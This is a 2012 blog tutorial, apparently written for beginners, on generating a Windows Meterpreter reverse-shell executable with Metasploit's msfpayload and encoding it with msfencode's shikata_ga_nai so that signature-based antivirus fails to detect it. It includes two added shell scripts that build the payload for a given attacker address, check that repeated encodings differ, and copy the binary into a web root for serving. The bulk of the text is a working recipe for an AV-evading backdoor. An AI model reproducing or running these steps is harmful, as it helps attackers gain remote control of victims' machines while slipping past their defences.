Friday, March 9, 2012

INTRODUCING METASPLOIT: msfpayload and msfencode to bypass AV (Anti-Virus)
msfpayload
The final phase of the exploit process involves the creation and encoding of a payload that is inserted into the attack string and sent to the target to be executed. A payload achieves a specific result on the target host, such as executing a command or opening a connection that returns a shell. One of the most powerful features of Metasploit is its ability to automatically generate architecture- and operating-system-specific shellcode. msfpayload is a command-line instance of Metasploit used to generate and output all of the various types of shellcode available in Metasploit. Shellcode can be generated in many formats, including C, Ruby, JavaScript and even Visual Basic for Applications.

The list of available payloads is printed with the -l option (msfpayload -l).
Screenshot: payload list
The next step is to determine the required payload variables by passing the S (summary) option along with the windows/meterpreter/reverse_tcp argument to msfpayload. This displays the payload's options and their defaults.
Screenshot: payload description
LPORT already has a default value of 4444. For a reverse_tcp payload, LHOST and LPORT are the address and port on the attacker's machine that the target connects back to, not a port opened on the target. To generate the payload we simply specify LHOST and LPORT and ask for a Windows executable with the X option. In this session I will make the executable file with the name newbiemoron.exe.

Screenshot: generating the executable
After generating the payload, locate the resulting file newbiemoron.exe on disk before going further.
Screenshot: locating the file
Generating the file is not the attack: to reach the target you still need an attack vector that gets the executable onto the machine and run.
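The msfpayload steps above (list the payloads, show the summary, generate the .exe) as an added example script; this is not code from the original post. The attacker address 192.168.1.100, the port 4444 and the output name newbiemoron.exe are assumptions for illustration, and the tool is only invoked if it is installed (Metasploit releases after 2015 replace msfpayload and msfencode with msfvenom).

```shell
#!/bin/sh
# Added example, not code from the original post: the msfpayload steps
# described above (list, summary, generate an .exe) wrapped in a script.
# Assumptions: attacker address 192.168.1.100, port 4444, output name
# newbiemoron.exe. msfpayload only runs if it is installed; on Metasploit
# releases after 2015 its job is done by msfvenom instead.

PAYLOAD="windows/meterpreter/reverse_tcp"

# The exact command the post runs: X emits a Windows PE executable on stdout,
# so it is redirected into the output file in the current directory.
payload_cmd() {
    # $1 = LHOST (attacker address the target connects back to)
    # $2 = LPORT (port the attacker's handler listens on)
    # $3 = output file
    echo "msfpayload $PAYLOAD LHOST=$1 LPORT=$2 X > $3"
}

# LPORT must be a TCP port number; catch typos before generating anything.
valid_port() {
    echo "$1" | grep -Eq '^[0-9]{1,5}$' && [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

generate_payload() {
    lhost="$1"; lport="$2"; out="$3"
    [ -n "$lhost" ] || { echo "LHOST is required" >&2; return 1; }
    valid_port "$lport" || { echo "bad LPORT: $lport" >&2; return 1; }
    if ! command -v msfpayload >/dev/null 2>&1; then
        echo "msfpayload not found; the command would be:" >&2
        payload_cmd "$lhost" "$lport" "$out" >&2
        return 2
    fi
    # -l lists every payload; make sure the one we want exists in this install.
    msfpayload -l | grep -q "$PAYLOAD" || { echo "payload not available" >&2; return 1; }
    # S prints the payload's options (LHOST, LPORT and its 4444 default).
    msfpayload "$PAYLOAD" S
    msfpayload "$PAYLOAD" LHOST="$lhost" LPORT="$lport" X > "$out"
    # Confirm the file landed where expected and is a PE executable.
    ls -l "$out" && file "$out"
}

if ! generate_payload 192.168.1.100 4444 newbiemoron.exe; then
    echo "payload not generated (see message above)" >&2
fi
```

The file is written to the current working directory because X streams the executable to stdout; the ls and file calls at the end replace the separate "locate" step and confirm that what was written is really a PE binary.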


msfencode

Metasploit's msfencode tool handles the entire encoding process of taking a payload and modifying its contents. It is one of the simplest ways to change a payload's byte pattern so that it is not stopped by signature-based antivirus software.

Screenshot: msfencode
To use msfencode, read the man page or the help menu (msfencode -h).
Screenshot: help menu
We add the R flag to the msfpayload command line to specify raw output, because we will pipe its output directly into msfencode. We select the x86/shikata_ga_nai encoder with -e and tell msfencode, with -t exe, to write the result as an executable to /var/www/newbiemoronX.exe (the -o output path), where the web server can serve it.

Screenshot: msfpayload piped into msfencode
Let's see whether the AV (anti-virus) detects the encoded file.
Screenshot: AV scan result, file not detected
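The msfpayload | msfencode pipeline from the paragraph above as an added example script (not code from the original post), with one extra check: the same payload is encoded twice and the two files are compared. LHOST 192.168.1.100, LPORT 4444 and five encoding passes (-c 5) are assumptions; /var/www/newbiemoronX.exe is the destination the post uses, and writing there normally needs root. The flags are those of the 2012-era tools; newer Metasploit releases fold both into msfvenom.

```shell
#!/bin/sh
# Added example, not code from the original post: the msfpayload | msfencode
# pipeline described above, followed by a check that two encodings of the
# same payload differ. Assumptions: LHOST 192.168.1.100, LPORT 4444, five
# encoding passes. /var/www/newbiemoronX.exe is the destination the post uses
# (writing there normally needs root). Newer Metasploit releases fold both
# tools into msfvenom; the flags below are the 2012-era ones.

PAYLOAD="windows/meterpreter/reverse_tcp"
ENCODER="x86/shikata_ga_nai"

# The pipeline from the text: R = raw shellcode on stdout, which msfencode
# reads on stdin; -e selects the encoder, -c the number of passes, -t exe
# wraps the result in a PE file, -o names the output.
encode_cmd() {
    # $1 LHOST, $2 LPORT, $3 encoding passes, $4 output file
    echo "msfpayload $PAYLOAD LHOST=$1 LPORT=$2 R | msfencode -e $ENCODER -c $3 -t exe -o $4"
}

# Run the pipeline once and print the MD5 of the produced file.
encode_once() {
    lhost="$1"; lport="$2"; iters="$3"; out="$4"
    msfpayload "$PAYLOAD" LHOST="$lhost" LPORT="$lport" R \
        | msfencode -e "$ENCODER" -c "$iters" -t exe -o "$out" >/dev/null
    md5sum "$out" | cut -d' ' -f1
}

# shikata_ga_nai picks a fresh key and decoder stub every run, so the same
# payload yields a different file each time; that is what defeats a simple
# file-hash or byte-pattern signature.
hashes_differ() { [ "$1" != "$2" ]; }

main() {
    if ! command -v msfencode >/dev/null 2>&1; then
        echo "msfencode not found; the pipeline would be:" >&2
        encode_cmd 192.168.1.100 4444 5 /var/www/newbiemoronX.exe >&2
        return 2
    fi
    h1=$(encode_once 192.168.1.100 4444 5 /tmp/newbiemoronX-1.exe)
    h2=$(encode_once 192.168.1.100 4444 5 /tmp/newbiemoronX-2.exe)
    if hashes_differ "$h1" "$h2"; then
        echo "two encodings of the same payload differ: $h1 / $h2"
    else
        echo "identical output; unexpected for $ENCODER" >&2
    fi
    # Final copy to the web root the post uses, so Apache can serve it.
    cp /tmp/newbiemoronX-1.exe /var/www/newbiemoronX.exe && file /var/www/newbiemoronX.exe
}

main
```

Encoding only changes the bytes on disk. Once the decoder stub runs, the original Meterpreter stager is back in memory unchanged, so a scanner that inspects the decoded stage or watches the process's behaviour is not affected; the AV check in the post is a static scan of the file and shows only that the on-disk signature no longer matches.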
Read the next chapter for an example of exploiting and backdooring Windows...
